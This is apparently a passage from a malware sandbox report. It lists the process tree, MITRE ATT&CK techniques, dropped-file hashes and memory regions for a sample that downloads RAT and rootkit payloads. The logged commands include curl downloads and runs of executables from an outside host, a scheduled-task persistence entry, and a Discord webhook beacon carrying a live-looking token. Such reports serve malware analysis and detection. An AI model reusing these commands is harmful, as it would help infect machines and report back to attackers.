C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe
4⤵
PID:4412

C:\Users\Admin\physics.exe
"C:\Users\Admin\physics.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe
4⤵
PID:4960

C:\Users\Admin\calc.exe
"C:\Users\Admin\calc.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Users\Admin\AppData\Roaming\svvhost.exe"
4⤵
- Creates scheduled task(s)
PID:2292

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4732

C:\Windows\SysWOW64\curl.exe
curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe
4⤵
PID:1864

C:\Users\Admin\install.exe
"C:\Users\Admin\install.exe"
3⤵
- Executes dropped EXE
PID:2468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
3⤵
PID:2140

C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
4⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3840

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4008

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4076

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2380

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:1344

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2020

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1060

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4004

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4916

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5504 -ip 5504
1⤵
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5648 -ip 5648
1⤵
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5648 -ip 5648
1⤵
PID:6712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\cwnctj.exe
Filesize
441KB

MD5
88cd2038e9fe0a8153c35122777c5e38

SHA1
2162d8ddc34977fff9a6a53764de8dc2b4610df3

SHA256
3afa48592f77dccc0a152f8c12c0e247f6fbaaf2780b81d006336217781e7187

SHA512
331e4011831a5914be03d762ffcbf8c3e473abce353542b302027848d77a9b2678185cb6a62ea957ef587ab9280ad5ecf4b3abc679218ff8efe8688bf3bded24

Download Submit
C:\Users\Admin\AppData\Local\Temp\idlbjl.exe
Filesize
16KB

MD5
0ec679d72215061d951df467b81d32a4

SHA1
d1eb7deaa9f8ac09f34aa5e938829e6695a013ae

SHA256
774f611c8c523381ba9a0b991d88273416ea3842517be1d8e645f46834c58786

SHA512
4bffd2b12dcfe1b974cc84d43c433dc500a1aacbf4f3394baad838c4eaaac80badcbb074b912e62d0cf65934a207c96c18eee515c3142b5c1c913d49ffd7a8d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
Filesize
12KB

MD5
a7bcf7ea8e9f3f36ebfb85b823e39d91

SHA1
761168201520c199dba68add3a607922d8d4a86e

SHA256
3ff64f10603f0330fa2386ff99471ca789391ace969bd0ec1c1b8ce1b4a6db42

SHA512
89923b669d31e590189fd06619bf27e47c5a47e82be6ae71fdb1b9b3b30b06fb7ca8ffed6d5c41ac410a367f2eb07589291e95a2644877d6bffd52775a5b1523

Download Submit
C:\Users\Admin\AppData\Local\Temp\pftcxn.exe
Filesize
98KB

MD5
059b6ee45303d3a049f58eda678b99aa

SHA1
f4bd3d67dc605d00f6cd635c95ed48409efeff29

SHA256
bc43c0f13a8f3604aae26d2130e626103fddbc2906dab42c1f86448e7e79f03b

SHA512
0a627271a70fd05ab0c50b9e08de38b0b58c43c2c0c62072b7276132afeb9047cff43cf7bd8b4cc8b67c387d80be41f23cc80926cbd76d8b9718786344cbab4b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize
8KB

MD5
0794894100534519779bbe05b9e55d08

SHA1
97ec555b4890c5b5480c9a795cf1002957245418

SHA256
edab1990d86f2d8ccd4185db4abd0c2f7665355a31097ff5e2c06af428d5b7e9

SHA512
6182ec1bf503b888260a152be8ae58949aca715f3306785cae097121c59b28b2f6512a440c95ef9f9d1d7b3ba653b9f90b5008d81f5e42f7659a3044a5941944

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\calc.exe
Filesize
35KB

MD5
8cc75bff0675c5c55483b206666b9dd3

SHA1
218198bfd494e31db303e55d41c110564835f0e3

SHA256
1a7b62006c6db37c873401724d0303fc789f2422bc7c1878f6dd5379f340d607

SHA512
0a6930caacdbf2003b29a12b0e8db682223800f285b1b8428cf29d00439d7ab7299d96dde9ae12e2121be1f6b4bb10a7a1477e759457ef7c85650784cc911879

Download Submit
C:\Users\Admin\install.exe
Filesize
163KB

MD5
1a7d1b5d24ba30c4d3d5502295ab5e89

SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563

SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Users\Admin\penisballs.exe
Filesize
256KB

MD5
18f497deffe88b6b2cff336a277aface

SHA1
4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

SHA256
8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

SHA512
35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

Download Submit
C:\Users\Admin\penisware.exe
Filesize
191KB

MD5
69d8b4e23e8772c8509e2f2d96d13d1e

SHA1
c29c85bd8c58b6b9aa3266763b3c5358d402d6ba

SHA256
c8bd8c0e90372507183037207e67c54129f7eec6a3596ff26cf13cee98dd865b

SHA512
7a5e39123f08c2bf521dbb31bd4c1ddb1a94d7dba26c31138ca071dc6d589dcf960e9e5cd691723703ab9939cf1abe73ef33b201019c8140d339ee7bcb1b4e6c

Download Submit
C:\Users\Admin\physics.exe
Filesize
256KB

MD5
7849154210d0e788d25f4f195438c765

SHA1
93018c5de438c48a4d890071352b60b81952fe17

SHA256
8ba1d2d467e3d78a65a238e592a81d6a518737bc077e39dd162cffc76ee18441

SHA512
bdc70b6615c794c222eb8f5004f0ed5a78062c282f8938556b514bf77bab79724a3a6a621672ba2d97fbbf1567bdc249ab6adb918ae5f2945e45b5d32f85a1d2

Download Submit
C:\Users\Admin\sachost.exe
Filesize
257KB

MD5
7a9290dfef391b53b114a8ddea1a7675

SHA1
b6a0047be861becb45d8868beffafb1216f6243a

SHA256
33b848f9b1ea8ec2f27da181512df79d9e65e2e8c814f1df29945d19d60708dc

SHA512
9a7f349698014256e950a81f42b9c9b20d25312a7310e914f9cebc553e872d23f1d14d802c656cde4867f93e1621e999f3a283ce01263fa567f2e41a36185d49

Download Submit
C:\Users\Admin\yar.exe
Filesize
192KB

MD5
9e8baf127b832943d4fae218ce90191a

SHA1
449e6f1c2c79cb0ee4d43151bcaa6ecfd38efa70

SHA256
fbbb58d64ed3d52ebf0c4442588f4a19e48fd64023188fb750926b13c40df8a0

SHA512
9af9e3e30c34ecad41277c0bb8e27eabaf7fa05249153ffac20262af4ed3680a5a85cc5c192b04b3da3835396ef68e4e4a8b9123c663d8cf2f3a8681db7f8114

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_j3tmzkq3.pi1.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\note.txt
Filesize
218B

MD5
afa6955439b8d516721231029fb9ca1b

SHA1
087a043cc123c0c0df2ffadcf8e71e3ac86bbae9

SHA256
8e9f20f6864c66576536c0b866c6ffdcf11397db67fe120e972e244c3c022270

SHA512
5da21a31fbc4e8250dffed30f66b896bdf007ac91948140334fe36a3f010e1bac3e70a07e9f3eb9da8633189091fd5cadcabbaacd3e01da0fe7ae28a11b3dddf

Download Submit
memory/316-106-0x00000146D9190000-0x00000146D91BB000-memory.dmp

Filesize
172KB

Download
memory/316-100-0x00000146D9190000-0x00000146D91BB000-memory.dmp

Filesize
172KB

Download
memory/316-107-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

Filesize
64KB

Download
memory/408-111-0x0000021EF84C0000-0x0000021EF84EB000-memory.dmp

Filesize
172KB

Download
memory/612-66-0x0000019D96FF0000-0x0000019D9701B000-memory.dmp

Filesize
172KB

Download
memory/612-65-0x0000019D96FC0000-0x0000019D96FE5000-memory.dmp

Filesize
148KB

Download
memory/612-73-0x0000019D96FF0000-0x0000019D9701B000-memory.dmp

Filesize
172KB

Download
memory/612-74-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

Filesize
64KB

Download
memory/612-67-0x0000019D96FF0000-0x0000019D9701B000-memory.dmp

Filesize
172KB

Download
memory/676-78-0x00000241CF000000-0x00000241CF02B000-memory.dmp

Filesize
172KB

Download
memory/676-85-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

Filesize
64KB

Download
memory/676-84-0x00000241CF000000-0x00000241CF02B000-memory.dmp

Filesize
172KB

Download
memory/920-1507-0x0000000000F50000-0x0000000000F5A000-memory.dmp

Filesize
40KB

Download
memory/952-95-0x000001D226900000-0x000001D22692B000-memory.dmp

Filesize
172KB

Download
memory/952-96-0x00007FFE0F630000-0x00007FFE0F640000-memory.dmp

Filesize
64KB

Download
memory/952-89-0x000001D226900000-0x000001D22692B000-memory.dmp

Filesize
172KB

Download
memory/1104-1398-0x0000000000530000-0x000000000053A000-memory.dmp

Filesize
40KB

Download
memory/1128-1083-0x0000000000B00000-0x0000000000B36000-memory.dmp

Filesize
216KB

Download
memory/1144-825-0x0000000000EF0000-0x0000000000F8D000-memory.dmp

Filesize
628KB

Download
memory/1144-1102-0x0000000000EF0000-0x0000000000F8D000-memory.dmp

Filesize
628KB

Download
memory/1388-49-0x0000024944CB0000-0x0000024944CDA000-memory.dmp

Filesize
168KB

Download
memory/1388-48-0x0000024944C60000-0x0000024944C82000-memory.dmp

Filesize
136KB

Download
memory/1388-51-0x00007FFE4E160000-0x00007FFE4E21E000-memory.dmp

Filesize
760KB

Download
memory/1388-50-0x00007FFE4F5B0000-0x00007FFE4F7A5000-memory.dmp

Filesize
2.0MB

Download
memory/1488-0-0x000000007522E000-0x000000007522F000-memory.dmp

Filesize
4KB

Download
memory/1488-1-0x0000000000790000-0x00000000007B6000-memory.dmp

Filesize
152KB

Download
memory/1836-7-0x0000000001070000-0x0000000001076000-memory.dmp

Filesize
24KB

Download
memory/1836-816-0x00000000029F0000-0x00000000029FC000-memory.dmp

Filesize
48KB

Download
memory/1836-6-0x0000000000890000-0x00000000008C8000-memory.dmp

Filesize
224KB

Download
memory/1836-5-0x00007FFE30A73000-0x00007FFE30A75000-memory.dmp

Filesize
8KB

Download
memory/1836-808-0x00007FFE30A73000-0x00007FFE30A75000-memory.dmp

Filesize
8KB

Download
memory/1924-18-0x0000000001650000-0x0000000001656000-memory.dmp

Filesize
24KB

Download
memory/1924-17-0x0000000000E70000-0x0000000000EA6000-memory.dmp

Filesize
216KB

Download
memory/1988-1173-0x0000000000080000-0x000000000008A000-memory.dmp

Filesize
40KB

Download
memory/1988-1184-0x0000000005C50000-0x0000000005CEC000-memory.dmp

Filesize
624KB

Download
memory/2032-1556-0x0000000000900000-0x000000000090A000-memory.dmp

Filesize
40KB

Download
memory/2068-1816-0x0000000000D20000-0x0000000000D2A000-memory.dmp

Filesize
40KB

Download
memory/2212-1647-0x0000000000DA0000-0x0000000000DAA000-memory.dmp

Filesize
40KB

Download
memory/2676-22-0x00000000007F0000-0x0000000000836000-memory.dmp

Filesize
280KB

Download
memory/2676-23-0x000000001B380000-0x000000001B386000-memory.dmp

Filesize
24KB

Download
memory/2688-59-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2688-55-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2688-54-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2688-60-0x00007FFE4F5B0000-0x00007FFE4F7A5000-memory.dmp

Filesize
2.0MB

Download
memory/2688-62-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2688-52-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2688-53-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2688-61-0x00007FFE4E160000-0x00007FFE4E21E000-memory.dmp

Filesize
760KB

Download
memory/2860-2002-0x0000000000850000-0x000000000085A000-memory.dmp

Filesize
40KB

Download
memory/3172-29-0x0000000001060000-0x0000000001066000-memory.dmp

Filesize
24KB

Download
memory/3172-28-0x0000000000870000-0x00000000008B6000-memory.dmp

Filesize
280KB

Download
memory/3216-1444-0x0000000000490000-0x000000000049A000-memory.dmp

Filesize
40KB

Download
memory/3324-1133-0x00000000004D0000-0x00000000004DA000-memory.dmp

Filesize
40KB

Download
memory/3324-1134-0x0000000005420000-0x00000000059C4000-memory.dmp

Filesize
5.6MB

Download
memory/3356-2042-0x0000000000880000-0x000000000088A000-memory.dmp

Filesize
40KB

Download
memory/3380-1060-0x00000000008D0000-0x00000000008E0000-memory.dmp

Filesize
64KB

Download
memory/3904-33-0x0000000000EA0000-0x0000000000EB0000-memory.dmp

Filesize
64KB

Download
memory/4308-11-0x0000000000FC0000-0x0000000001006000-memory.dmp

Filesize
280KB

Download
memory/4308-12-0x0000000003060000-0x0000000003066000-memory.dmp

Filesize
24KB

Download
memory/4508-1608-0x0000000000140000-0x000000000014A000-memory.dmp

Filesize
40KB

Download
memory/4528-1046-0x0000000000B30000-0x0000000000B68000-memory.dmp

Filesize
224KB

Download
memory/5704-1737-0x0000000000620000-0x000000000062A000-memory.dmp

Filesize
40KB

Download
memory/5736-1870-0x00000000002B0000-0x00000000002BA000-memory.dmp

Filesize
40KB

Download
memory/6508-2332-0x0000000000B80000-0x0000000000B8A000-memory.dmp

Filesize
40KB

Download
memory/6568-2167-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads